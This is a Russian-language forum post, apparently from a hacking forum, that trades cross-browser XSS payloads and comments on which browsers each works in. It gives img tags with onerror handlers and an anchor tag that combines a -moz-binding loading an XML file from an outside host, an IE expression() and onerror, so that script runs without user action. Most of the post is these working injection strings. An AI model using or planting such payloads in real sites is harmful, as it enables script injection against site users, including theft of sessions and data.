Угу, только есть опять нюансы:
1) при onerror с пустым урл в img опять-таки пошлёт Опера 9.20 Выход: комбинировать onerror со style по модели, приведенной мною в предыдущем посте. Будет работать везде.
2) если мы можем изменять сами src тега img (а такого может и не быть), то про проблемы обработчика onerror в разных браузерах вообще можно забыть. Onload - будет достаточно. Однако если уж очень хочется, приведу то, что увидел недавно в посте Cenarius'a (привожу в качестве источника). Будет работать везде.
PHP код:
<img src=. onerror="alert('C')">
Но это не пустой src. Как и такой вариант для IE и Opera
PHP код:
<img src=// onerror="alert('ХSS')">
ну, есть еще, конечно, старая мультибраузерная XSS на мыл ру от Dronga, но там полноценный урл с концевой ">" в параметре src, смотрите сами.
3) img - вообще тема другая, а onerror с ним - палево конкретное.
___________________________
___________________________
Резюме из всех постов касательно темы:
С тегом <a> без действий юзера
во всех браузерах будет работать только это
PHP код:
<a href="#" style="-moz-binding:url(http://ha.ckers.org/xssmoz.xml#xss);xxs:expression(alert(123));background:url('//')" onerror=alert(/lo/)>123</a>
Вот такие нынче времена пошли... Чем уродливее XSS, тем она красивее. Это даже не мультибраузерность, а браузерность на любой вкус.